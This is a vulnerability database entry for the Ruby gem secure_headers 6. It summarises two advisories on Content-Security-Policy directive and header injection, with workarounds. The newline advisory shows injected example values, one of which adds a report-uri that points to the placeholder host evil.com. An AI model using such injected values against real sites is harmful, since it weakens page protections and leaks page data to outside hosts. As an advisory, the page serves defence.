Search for packages
| purl | pkg:gem/secure_headers@6 |
| Tags | Ghost |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-f7yt-1t4f-ufhx
Aliases: CVE-2020-5217 GHSA-xq52-rv6w-397c |
secure_headers directive injection using semicolon If user-supplied input was passed into append/override_content_security_policy_directives, a semicolon could be injected leading to directive injection. This could be used to e.g. override a script-src directive. Duplicate directives are ignored and the first one wins. The directives in secure_headers are sorted alphabetically so they pretty much all come before script-src. A previously undefined directive would receive a value even if SecureHeaders::OPT_OUT was supplied. The fixed versions will silently convert the semicolons to spaces and emit a deprecation warning when this happens. This will result in innocuous browser console messages if being exploited/accidentally used. In future releases, we will raise application errors resulting in 500s. > Duplicate script-src directives detected. All but the first instance will be ignored. See https://www.w3.org/TR/CSP3/#parse-serialized-policy > Note: In this case, the user agent SHOULD notify developers that a duplicate directive was > ignored. A console warning might be appropriate, for example. # Workarounds If you are passing user input into the above methods, you could filter out the input: ``` override_content_security_policy_directives(:frame_src, [user_input.gsub(";", " ")]) ``` |
Affected by 1 other vulnerability. |
|
VCID-mr8k-d23n-e3c6
Aliases: CVE-2020-5216 GHSA-w978-rmpf-qmwg |
secure_headers header injection due to newline If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection. Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy header with the remaining value of the original string. It will continue to create new headers for each newline. e.g. ``` override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"]) ``` would result in ``` Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: injected Content-Security-Policy: rest-of-the-header ``` CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial: ``` override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"]) ``` ``` Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: default-src 'none'; report-uri evil.com Content-Security-Policy: rest-of-the-header ``` Workarounds ``` override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")]) ``` |
Affected by 0 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||
| Date | Actor | Action | Vulnerability | Source | VulnerableCode Version |
|---|---|---|---|---|---|
| 2026-06-04T16:14:54.185142+00:00 | Ruby Importer | Affected by | VCID-f7yt-1t4f-ufhx | https://github.com/rubysec/ruby-advisory-db/blob/master/gems/secure_headers/CVE-2020-5217.yml | 38.6.0 |
| 2026-06-04T16:14:54.164253+00:00 | Ruby Importer | Affected by | VCID-mr8k-d23n-e3c6 | https://github.com/rubysec/ruby-advisory-db/blob/master/gems/secure_headers/CVE-2020-5216.yml | 38.6.0 |